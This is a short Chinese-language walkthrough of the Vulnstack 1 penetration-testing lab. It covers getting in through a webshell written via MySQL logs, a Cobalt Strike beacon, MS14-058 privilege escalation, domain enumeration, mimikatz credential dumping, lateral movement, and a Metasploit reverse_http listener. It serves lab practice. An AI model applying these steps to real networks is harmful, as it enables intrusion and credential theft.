红日靶场-vulnstack(一)
环境搭建
- 
宿舍wifi环境,手头有两台笔记本,所以选择桥接模拟外网
 - 
win7 两张网卡 vmnet0(设置桥接)/vmnet1(仅主机模式)
 - 
win2k3 vmnet1(仅主机模式)
 - 
win2k8 vmnet1(仅主机模式)
 - 
win7 需要先启动phpstudy
 
外网渗透
- 
yxcms后台模板编辑
 - 
mysql日志写一句话
 
内网渗透
没有杀毒软件,用cs直接生成exe执行上线,管理员权限,可以用ms14-058进行提权

提权之后,一些命令就不会拒绝访问了
$ net view 
服务器名称            注解
-------------------------------------------------------------------------------
\\OWA                                                                          
\\ROOT-TVI862UBEH   
$ net time /domain
\\owa.god.org 的当前时间是 2021/9/18 17:53:14
这项请求将在域 god.org 的域控制器处理。
$ net user /domain
\\owa.god.org 的用户帐户
-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt                   
ligang                   liukaifeng01   
$ net view /domain
Domain
-------------------------------------------------------------------------------
GOD                  
命令成功完成。
以太网适配器 本地连接 4:
   连接特定的 DNS 后缀 . . . . . . . : localdomain
   本地链接 IPv6 地址. . . . . . . . : fe80::2848:f647:26ac:ffa5%25
   IPv4 地址 . . . . . . . . . . . . : 192.168.52.128
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::c4ff:8294:2ec:19d9%11
   IPv4 地址 . . . . . . . . . . . . : 192.168.1.104
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.1.1
用mimikatz抓取密码

hashdump

派生一个smb的beacon,先建个监听器,然后spawn

使用凭据进行横向


另外一台同理

可以派生到msf,创建一个监听器,然后spawn

msf设置:
Payload options (windows/meterpreter/reverse_http):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     0                yes       The local listener hostname
   LPORT     1234             yes       The local listener port
   LURI                       no        The HTTP Path
总结
熟悉cobalt strike的使用